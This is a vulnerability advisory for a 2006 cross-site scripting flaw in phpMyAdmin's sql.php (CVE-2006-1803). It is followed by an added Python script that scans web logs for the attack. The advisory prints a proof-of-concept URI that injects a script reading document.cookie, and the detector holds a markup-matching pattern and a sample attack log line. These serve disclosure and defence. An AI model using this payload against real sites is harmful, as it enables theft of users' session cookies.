PHPMyAdmin SQL.PHP Cross-Site Scripting Vulnerability
BID:17487
Info
| Bugtraq ID: | 17487 |
| Class: | Input Validation Error |
| CVE: | CVE-2006-1803 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 31 2005 12:00AM |
| Updated: | Apr 28 2006 09:40PM |
| Credit: | p0w3r is credited with the discovery of this vulnerability. |
| Vulnerable: | S.u.S.E. Linux Professional 10.0 OSS; S.u.S.E. Linux Professional 10.0; S.u.S.E. Linux Professional 9.3 x86_64; S.u.S.E. Linux Professional 9.3; S.u.S.E. Linux Professional 9.2 x86_64; S.u.S.E. Linux Professional 9.2; S.u.S.E. Linux Professional 9.1 x86_64; S.u.S.E. Linux Professional 9.1; S.u.S.E. Linux Professional 9.0 x86_64; S.u.S.E. Linux Professional 9.0; S.u.S.E. Linux Personal 10.0 OSS; S.u.S.E. Linux Personal 9.3 x86_64; S.u.S.E. Linux Personal 9.3; S.u.S.E. Linux Personal 9.2 x86_64; S.u.S.E. Linux Personal 9.2; S.u.S.E. Linux Personal 9.1 x86_64; S.u.S.E. Linux Personal 9.1; S.u.S.E. Linux Personal 9.0 x86_64; S.u.S.E. Linux Personal 9.0; phpMyAdmin phpMyAdmin 2.7 -pl1 |
| Not Vulnerable: | |
Discussion
PHPMyAdmin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Exploit / POC
This issue can be exploited via a web client.
The following proof-of-concept URI is available:
http://www.example.com//phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(document.cookie)%3C/script%3E'%60
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
SUSE Linux has released a security summary report addressing this and other issues.
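The following detection logic is an added example, not part of the original advisory: it flags web-server access-log lines in which a request to sql.php carries HTML markup in the sql_query parameter, the pattern shown in the proof-of-concept URI above. The combined log format, the tag list, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request part of a combined-log-format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# HTML tags / script URLs that have no place in a SQL statement (heuristic list, an assumption)
MARKUP_RE = re.compile(
    r"<\s*/?\s*(?:script|iframe|img|svg|object|embed|style|body)\b|javascript:", re.IGNORECASE)

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding a bounded number of times."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_sql_query(log_line):
    """Return the decoded sql_query if a sql.php request carries markup, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith("/sql.php"):
        return None
    # parse_qs already decodes once; decode_fully catches values encoded more than once
    for raw in parse_qs(target.query, keep_blank_values=True).get("sql_query", []):
        value = decode_fully(raw)
        if MARKUP_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    flagged = ((n, suspicious_sql_query(line)) for n, line in enumerate(lines, start=1))
    return [(n, value) for n, value in flagged if value is not None]

# Constructed sample log: line 1 is a benign query, line 2 carries the PoC query string from this page.
SAMPLE_LOG = """\
192.0.2.10 - - [28/Apr/2006:21:40:00 +0000] "GET /phpmyadmin/sql.php?server=1&db=fu&table=fu&sql_query=SELECT+*+FROM+%60fu%60+WHERE+id+%3C+10 HTTP/1.1" 200 5120
192.0.2.77 - - [28/Apr/2006:21:41:12 +0000] "GET //phpmyadmin/sql.php?lang=de-utf-8&server=1&db=fu&table=fu&sql_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(document.cookie)%3C/script%3E'%60 HTTP/1.1" 200 6210
""".splitlines()

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: markup in sql_query -> {value}")
```

The tag list is a heuristic: an ordinary SQL comparison such as `id < 10` is not flagged, and only query-string parameters are inspected, so POST bodies need a separate source such as application or WAF logs.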